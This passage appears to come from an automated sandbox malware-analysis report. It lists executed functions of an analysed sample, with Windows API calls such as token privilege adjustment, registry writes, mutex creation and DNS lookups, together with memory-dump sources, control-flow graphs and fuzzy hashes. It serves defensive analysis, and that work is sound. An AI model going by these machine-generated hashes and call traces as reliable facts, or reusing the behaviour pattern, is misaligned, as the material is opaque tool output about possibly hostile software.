5171aeb 4806->4807 4704 ffa38e 4705 ffa3ba FindCloseChangeNotification 4704->4705 4706 ffa3f9 4704->4706 4707 ffa3c8 4705->4707 4706->4705 4828 51712e0 4829 51712fe GetProcessTimes 4828->4829 4831 5171385 4829->4831 4808 ffa986 4809 ffa9b6 DuplicateHandle 4808->4809 4811 ffaa02 4809->4811 4744 ffb084 4746 ffb0a6 CreateFileW 4744->4746 4747 ffb12d 4746->4747 4780 51713e8 4781 517140a getaddrinfo 4780->4781 4783 51714b7 4781->4783

                                                                                                                                                                    Executed Functions

                                                                                                                                                                    Function 051717FB Relevance: 1.6, APIs: 1, Instructions: 75COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 0517187B
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.4207927800.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_5170000_essam@sasa2023.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AdjustPrivilegesToken
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2874748243-0
                                                                                                                                                                    • Opcode ID: 0dbea6fdab44a8165cf46771ab8e5918f6e3ef960fee5b387d654a290caf34cf
                                                                                                                                                                    • Instruction ID: cb096f243388de2c2c31ec4abd9a1b929e8097eb5fbd28f77e1309854cebf117
                                                                                                                                                                    • Opcode Fuzzy Hash: 0dbea6fdab44a8165cf46771ab8e5918f6e3ef960fee5b387d654a290caf34cf
                                                                                                                                                                    • Instruction Fuzzy Hash: 3721B175509384AFEB228F25DC44B62BFF4FF06310F08859AE9858B163D331D918CB62
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 05171832 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 0517187B
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.4207927800.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_5170000_essam@sasa2023.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AdjustPrivilegesToken
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2874748243-0
                                                                                                                                                                    • Opcode ID: 3f621de5ef7e34f691b299fcc3950c1431e8fd960d0efd9265f604661f67b3fc
                                                                                                                                                                    • Instruction ID: ae75985cb0105c116078ff8e662ed7433807cc4f8a7bdfc5c316438e9deaa6e0
                                                                                                                                                                    • Opcode Fuzzy Hash: 3f621de5ef7e34f691b299fcc3950c1431e8fd960d0efd9265f604661f67b3fc
                                                                                                                                                                    • Instruction Fuzzy Hash: ED117076600204AFEB20CF59D884B66FBF4FF04320F08C56AED498B652D735E458CB61
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 05171E80 Relevance: 1.6, APIs: 1, Instructions: 100registryCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 669 5171e80-5171efa 673 5171eff-5171f0b 669->673 674 5171efc 669->674 675 5171f10-5171f19 673->675 676 5171f0d 673->676 674->673 677 5171f1e-5171f35 675->677 678 5171f1b 675->678 676->675 680 5171f77-5171f7c 677->680 681 5171f37-5171f4a RegCreateKeyExW 677->681 678->677 680->681 682 5171f7e-5171f83 681->682 683 5171f4c-5171f74 681->683 682->683
                                                                                                                                                                    APIs
                                                                                                                                                                    • RegCreateKeyExW.KERNEL32(?,00000E84), ref: 05171F3D
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.4207927800.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_5170000_essam@sasa2023.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Create
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2289755597-0
                                                                                                                                                                    • Opcode ID: ff95d0c704c2da24ca378b137dfc919f922cc5d12e310ab01c9a56b9fcb6e59e
                                                                                                                                                                    • Instruction ID: 56d78863d73f1e05dbf619a1ca8c96c4e7f2872a177f26c8db47d2b00629cf7b
                                                                                                                                                                    • Opcode Fuzzy Hash: ff95d0c704c2da24ca378b137dfc919f922cc5d12e310ab01c9a56b9fcb6e59e
                                                                                                                                                                    • Instruction Fuzzy Hash: 90319072504348AFEB228B25CC44FA7BBFCEF05614F08855AF985D7652D324E519CB71
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0517064B Relevance: 1.6, APIs: 1, Instructions: 98registryCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 688 517064b-517066b 689 517068d-51706bf 688->689 690 517066d-517068c 688->690 694 51706c2-517071a RegQueryValueExW 689->694 690->689 696 5170720-5170736 694->696
                                                                                                                                                                    APIs
                                                                                                                                                                    • RegQueryValueExW.KERNEL32(?,00000E84,?,?), ref: 05170712
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.4207927800.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_5170000_essam@sasa2023.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: QueryValue
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3660427363-0
                                                                                                                                                                    • Opcode ID: 734d8010591d23a4dcb922b369acd9c2ee2108cc13dad681b7d136fe520efd94
                                                                                                                                                                    • Instruction ID: 730b66f155208189d5cd60d716ce526b1a387dd0d491d60018a6df90f0687ff0
                                                                                                                                                                    • Opcode Fuzzy Hash: 734d8010591d23a4dcb922b369acd9c2ee2108cc13dad681b7d136fe520efd94
                                                                                                                                                                    • Instruction Fuzzy Hash: 9C31907110E3C06FD3138B258C65A61BFB4EF87610B0E45CBD8C48F5A3D2296919C7B2
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 051713E8 Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 713 51713e8-51714a7 719 51714f9-51714fe 713->719 720 51714a9-51714b1 getaddrinfo 713->720 719->720 721 51714b7-51714c9 720->721 723 5171500-5171505 721->723 724 51714cb-51714f6 721->724 723->724
                                                                                                                                                                    APIs
                                                                                                                                                                    • getaddrinfo.WS2_32(?,00000E84), ref: 051714AF
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.4207927800.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_5170000_essam@sasa2023.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: getaddrinfo
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 300660673-0
                                                                                                                                                                    • Opcode ID: 899524a25b8e7bedf52c10f4ab18aef753b751efd3d3b5a0dd494b13d6d1a67b
                                                                                                                                                                    • Instruction ID: 42231d67ee6d97697c3caf461665ec8caa7f0dc5ab90e8143281be7eb02b845b
                                                                                                                                                                    • Opcode Fuzzy Hash: 899524a25b8e7bedf52c10f4ab18aef753b751efd3d3b5a0dd494b13d6d1a67b
                                                                                                                                                                    • Instruction Fuzzy Hash: CA31B372104344AFEB21CB51CC44FA6FBACEF04314F04449AFA499B592D775A909CB65
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00FFB5EC Relevance: 1.6, APIs: 1, Instructions: 93windowtimeCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 697 ffb5ec-ffb5f7 698 ffb5f9-ffb67c 697->698 699 ffb664-ffb669 697->699 701 ffb67f-ffb69d 698->701 699->701 702 ffb66b-ffb67c 699->702 705 ffb69f-ffb6a7 SendMessageTimeoutA 701->705 706 ffb6e1-ffb6e6 701->706 702->701 708 ffb6ad-ffb6bf 705->708 706->705 709 ffb6e8-ffb6ed 708->709 710 ffb6c1-ffb6de 708->710 709->710
                                                                                                                                                                    APIs
                                                                                                                                                                    • SendMessageTimeoutA.USER32(?,00000E84), ref: 00FFB6A5
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.4194911883.0000000000FFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FFA000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_ffa000_essam@sasa2023.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: MessageSendTimeout
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1599653421-0
                                                                                                                                                                    • Opcode ID: c31ac4edfedd2fc5de1734792679d9e222e93779302fedb7a022f7cec2f2bfbc
                                                                                                                                                                    • Instruction ID: e4f2c6677be48ecb7c2a6d070d83495b3d3e15f900177002940dc3551e544c52
                                                                                                                                                                    • Opcode Fuzzy Hash: c31ac4edfedd2fc5de1734792679d9e222e93779302fedb7a022f7cec2f2bfbc
                                                                                                                                                                    • Instruction Fuzzy Hash: 76310872504344AFEB228F21DC45FA2FFB4FF45320F18849AE9849B5A2D335A909DB65
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 05171C1A Relevance: 1.6, APIs: 1, Instructions: 91windowCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 728 5171c1a-5171c7f 730 5171c82-5171cd4 FormatMessageW 728->730 732 5171cda-5171d03 730->732
                                                                                                                                                                    APIs
                                                                                                                                                                    • FormatMessageW.KERNEL32(?,00000E84,?,?), ref: 05171CD2
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.4207927800.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_5170000_essam@sasa2023.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FormatMessage
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1306739567-0
                                                                                                                                                                    • Opcode ID: 346ee915507dcadf75618cdab29928eef2a329c3bf2d565efc7b616e31b405d1
                                                                                                                                                                    • Instruction ID: b66d73b31765ed6e33797e704f222b2abb54207b89e789e1524498f6ce94b760
                                                                                                                                                                    • Opcode Fuzzy Hash: 346ee915507dcadf75618cdab29928eef2a329c3bf2d565efc7b616e31b405d1
                                                                                                                                                                    • Instruction Fuzzy Hash: F4316F7250D3C45FD7038B218C55A66BFB4EF87610F0984CBD8849F6A3E6256919C7A2
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 051712E0 Relevance: 1.6, APIs: 1, Instructions: 90timeCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 765 51712e0-5171375 770 5171377-517137f GetProcessTimes 765->770 771 51713c2-51713c7 765->771 772 5171385-5171397 770->772 771->770 774 51713c9-51713ce 772->774 775 5171399-51713bf 772->775 774->775
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetProcessTimes.KERNEL32(?,00000E84,ADB2B937,00000000,00000000,00000000,00000000), ref: 0517137D
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.4207927800.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_5170000_essam@sasa2023.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ProcessTimes
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1995159646-0
                                                                                                                                                                    • Opcode ID: 4d687f34620d296b754d1277ae17255f4dee7ecdcde8bbb66780ce05b4e0a03b
                                                                                                                                                                    • Instruction ID: 292894e96e796cdaf4539bac402ab6049eacb88ffe5e306ac4ab8caf313c05cb
                                                                                                                                                                    • Opcode Fuzzy Hash: 4d687f34620d296b754d1277ae17255f4dee7ecdcde8bbb66780ce05b4e0a03b
                                                                                                                                                                    • Instruction Fuzzy Hash: C331F5725093846FEB128F21DC44FA6BFB8EF06320F08849AE984CB593D3259519C775
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00FFAADD Relevance: 1.6, APIs: 1, Instructions: 90registryCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 734 ffaadd-ffab69 738 ffab6e-ffab85 734->738 739 ffab6b 734->739 741 ffabc7-ffabcc 738->741 742 ffab87-ffab9a RegOpenKeyExW 738->742 739->738 741->742 743 ffabce-ffabd3 742->743 744 ffab9c-ffabc4 742->744 743->744
                                                                                                                                                                    APIs
                                                                                                                                                                    • RegOpenKeyExW.KERNEL32(?,00000E84), ref: 00FFAB8D
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.4194911883.0000000000FFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FFA000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_ffa000_essam@sasa2023.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Open
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 71445658-0
                                                                                                                                                                    • Opcode ID: dfb8f966498ac980527f38b2460357fd7ea7dff402ac0938847d635aba4d3fc9
                                                                                                                                                                    • Instruction ID: f3ce0b6516056fa45b52daaa791c84c95c390110618e36d49dfaa1ae585db7cf
                                                                                                                                                                    • Opcode Fuzzy Hash: dfb8f966498ac980527f38b2460357fd7ea7dff402ac0938847d635aba4d3fc9
                                                                                                                                                                    • Instruction Fuzzy Hash: 963182B6409344AFE7228B11CC44FA6BFBCEF45314F08849AEA458B653D224A959CB76
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00FFB084 Relevance: 1.6, APIs: 1, Instructions: 90fileCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 749 ffb084-ffb0fe 753 ffb103-ffb10f 749->753 754 ffb100 749->754 755 ffb114-ffb11d 753->755 756 ffb111 753->756 754->753 757 ffb11f-ffb143 CreateFileW 755->757 758 ffb16e-ffb173 755->758 756->755 761 ffb175-ffb17a 757->761 762 ffb145-ffb16b 757->762 758->757 761->762
                                                                                                                                                                    APIs
                                                                                                                                                                    • CreateFileW.KERNEL32(?,?,?,?,?,?), ref: 00FFB125
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.4194911883.0000000000FFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FFA000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_ffa000_essam@sasa2023.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CreateFile
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 823142352-0
                                                                                                                                                                    • Opcode ID: d77bc31cf5f75c15f68e4530fb50a5b545990930ee4d5548811b4239c317320a
                                                                                                                                                                    • Instruction ID: 0e05ebba5f1716013b76aeeeb4527d592c4d92aa98959ddef1f66b1c50de814f
                                                                                                                                                                    • Opcode Fuzzy Hash: d77bc31cf5f75c15f68e4530fb50a5b545990930ee4d5548811b4239c317320a
                                                                                                                                                                    • Instruction Fuzzy Hash: 0731AF71504344AFE721CF26CC44F66BBE8EF05720F08849EE9858B662D375E819DB71
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 05170BDC Relevance: 1.6, APIs: 1, Instructions: 89COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(?,00000E84), ref: 05170C73
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.4207927800.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_5170000_essam@sasa2023.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: DescriptorSecurity$ConvertString
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3907675253-0
                                                                                                                                                                    • Opcode ID: d3bae8f234ee07f4a4b2be40a9f8d791a8088681156b0a0df340ec9e9c53164e
                                                                                                                                                                    • Instruction ID: 149a62f24e311e524743f3a4d9a281b0e01ec245209b54b8b15cdeaeb6d3dd48
                                                                                                                                                                    • Opcode Fuzzy Hash: d3bae8f234ee07f4a4b2be40a9f8d791a8088681156b0a0df340ec9e9c53164e
                                                                                                                                                                    • Instruction Fuzzy Hash: 9631C172504344AFEB21CB25DC49FA7BFF8EF05310F08889AE944CB652D324E809CB62
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00FFB4EE Relevance: 1.6, APIs: 1, Instructions: 89synchronizationCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • CreateMutexW.KERNEL32(?,?), ref: 00FFB595
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.4194911883.0000000000FFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FFA000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_ffa000_essam@sasa2023.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CreateMutex
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1964310414-0
                                                                                                                                                                    • Opcode ID: 6f4f877137b21ef7d6dff99031d2ae719371303cc51381adcbfa09c277a67996
                                                                                                                                                                    • Instruction ID: 99496125b23808fefed1e48f517c5f33de06e985257ceb6319221aaaaee57c06
                                                                                                                                                                    • Opcode Fuzzy Hash: 6f4f877137b21ef7d6dff99031d2ae719371303cc51381adcbfa09c277a67996
                                                                                                                                                                    • Instruction Fuzzy Hash: 743193715093846FE711CB25DC85BA6BFF8EF06310F08849AE984CB293D375E909C762
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00FFABD5 Relevance: 1.6, APIs: 1, Instructions: 89registryCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 778 ffabd5-ffac53 781 ffac58-ffac61 778->781 782 ffac55 778->782 783 ffac66-ffac6c 781->783 784 ffac63 781->784 782->781 785 ffac6e 783->785 786 ffac71-ffac88 783->786 784->783 785->786 788 ffacbf-ffacc4 786->788 789 ffac8a-ffac9d RegQueryValueExW 786->789 788->789 790 ffac9f-ffacbc 789->790 791 ffacc6-ffaccb 789->791 791->790
                                                                                                                                                                    APIs
                                                                                                                                                                    • RegQueryValueExW.KERNEL32(?,00000E84,ADB2B937,00000000,00000000,00000000,00000000), ref: 00FFAC90
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.4194911883.0000000000FFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FFA000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_ffa000_essam@sasa2023.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: QueryValue
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3660427363-0
                                                                                                                                                                    • Opcode ID: 3173760a2edc2bfddd6727e2b963110fe33125a95e859ce36e49ad66f2279f4d
                                                                                                                                                                    • Instruction ID: dc154c55aa5c9761582f0b0ccd5b0945e9ef8b3e59414ef7459c321087b59c8f
                                                                                                                                                                    • Opcode Fuzzy Hash: 3173760a2edc2bfddd6727e2b963110fe33125a95e859ce36e49ad66f2279f4d
                                                                                                                                                                    • Instruction Fuzzy Hash: 7B31B7755053846FD722CF21CC44F62BFF8EF06720F08849AE988CB663D264E949CB61
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 05171EA2 Relevance: 1.6, APIs: 1, Instructions: 86registryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • RegCreateKeyExW.KERNEL32(?,00000E84), ref: 05171F3D
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.4207927800.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_5170000_essam@sasa2023.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Create
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2289755597-0
                                                                                                                                                                    • Opcode ID: 0d76dbbb38c8970a382a89323a765ea3a8a84bc9a0c74b424782b4a229fc1128
                                                                                                                                                                    • Instruction ID: a54d11478ed933eccfb6798c46e7bff1bd076e51b9b644758a6a3efafe9c2336
                                                                                                                                                                    • Opcode Fuzzy Hash: 0d76dbbb38c8970a382a89323a765ea3a8a84bc9a0c74b424782b4a229fc1128
                                                                                                                                                                    • Instruction Fuzzy Hash: 36218D76600208AFEB21CF29CC44FA7BBFCEF08614F04855AE945D7A52E734E519CA61
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0517140A Relevance: 1.6, APIs: 1, Instructions: 84COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • getaddrinfo.WS2_32(?,00000E84), ref: 051714AF
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.4207927800.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_5170000_essam@sasa2023.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: getaddrinfo
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 300660673-0
                                                                                                                                                                    • Opcode ID: ed1b9a01c74713234acb143ae4a56fbe615962c96f5957b17ea1a465be0618e1
                                                                                                                                                                    • Instruction ID: 0ba1a80df9399f6132c990bdefae9ca99102b0554a7fa2d57a7ecb607ece9eaf
                                                                                                                                                                    • Opcode Fuzzy Hash: ed1b9a01c74713234acb143ae4a56fbe615962c96f5957b17ea1a465be0618e1
                                                                                                                                                                    • Instruction Fuzzy Hash: 9F21D172100204AEEB30DF65CC84FA6F7ECEF04314F04885AFA499B681D775A949CB75
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00FFB327 Relevance: 1.6, APIs: 1, Instructions: 81registryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • RegSetValueExW.KERNEL32(?,00000E84,ADB2B937,00000000,00000000,00000000,00000000), ref: 00FFB3D4
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.4194911883.0000000000FFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FFA000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_ffa000_essam@sasa2023.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Value
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3702945584-0
                                                                                                                                                                    • Opcode ID: 9a6aa56bb57a6b57a41c5f9ce4e6b6f6c33f7f2d4d4d9096f1661d779d2984c9
                                                                                                                                                                    • Instruction ID: cbad8fc18f0bd9a5c4118d7b41653f2534288da0dfb8668197bdb1e371dfc767
                                                                                                                                                                    • Opcode Fuzzy Hash: 9a6aa56bb57a6b57a41c5f9ce4e6b6f6c33f7f2d4d4d9096f1661d779d2984c9
                                                                                                                                                                    • Instruction Fuzzy Hash: 6821C3765043846FE722CB11CC44BA3BFB8EF06324F08849AE9858B6A3D324E809C771
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0517197D Relevance: 1.6, APIs: 1, Instructions: 79COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetExitCodeProcess.KERNEL32(?,00000E84,ADB2B937,00000000,00000000,00000000,00000000), ref: 05171A04
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.4207927800.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_5170000_essam@sasa2023.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CodeExitProcess
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3861947596-0
                                                                                                                                                                    • Opcode ID: fd9e7119b915f513c13d6476f30427a752dc1b1c6d23aa7b0de55a06b989ed5a
                                                                                                                                                                    • Instruction ID: bfa4b802ab34b46dd7834aa8a67cd2460bcc9a2e31caecb135e0050dd151a2b5
                                                                                                                                                                    • Opcode Fuzzy Hash: fd9e7119b915f513c13d6476f30427a752dc1b1c6d23aa7b0de55a06b989ed5a
                                                                                                                                                                    • Instruction Fuzzy Hash: D321C4715093846FE712CB25CC44FA6BFB8EF42314F0884DAE944DF593D268A909C775
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00FFB17C Relevance: 1.6, APIs: 1, Instructions: 79COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetFileType.KERNEL32(?,00000E84,ADB2B937,00000000,00000000,00000000,00000000), ref: 00FFB211
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.4194911883.0000000000FFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FFA000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_ffa000_essam@sasa2023.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FileType
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3081899298-0
                                                                                                                                                                    • Opcode ID: f08339ca0812787799b96016eec1743b5afc94c8c3240464d9ece0c9b1633de2
                                                                                                                                                                    • Instruction ID: 4499895df80b8faa8c1a2dfec68f4cd8bcd320091bc25049307e5d441319b0c7
                                                                                                                                                                    • Opcode Fuzzy Hash: f08339ca0812787799b96016eec1743b5afc94c8c3240464d9ece0c9b1633de2
                                                                                                                                                                    • Instruction Fuzzy Hash: 96213AB54093806FE7128B15DC85BB2BFBCEF46324F0884D6ED848B6A3D364A909C775
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 05170D92 Relevance: 1.6, APIs: 1, Instructions: 77fileCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.4207927800.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
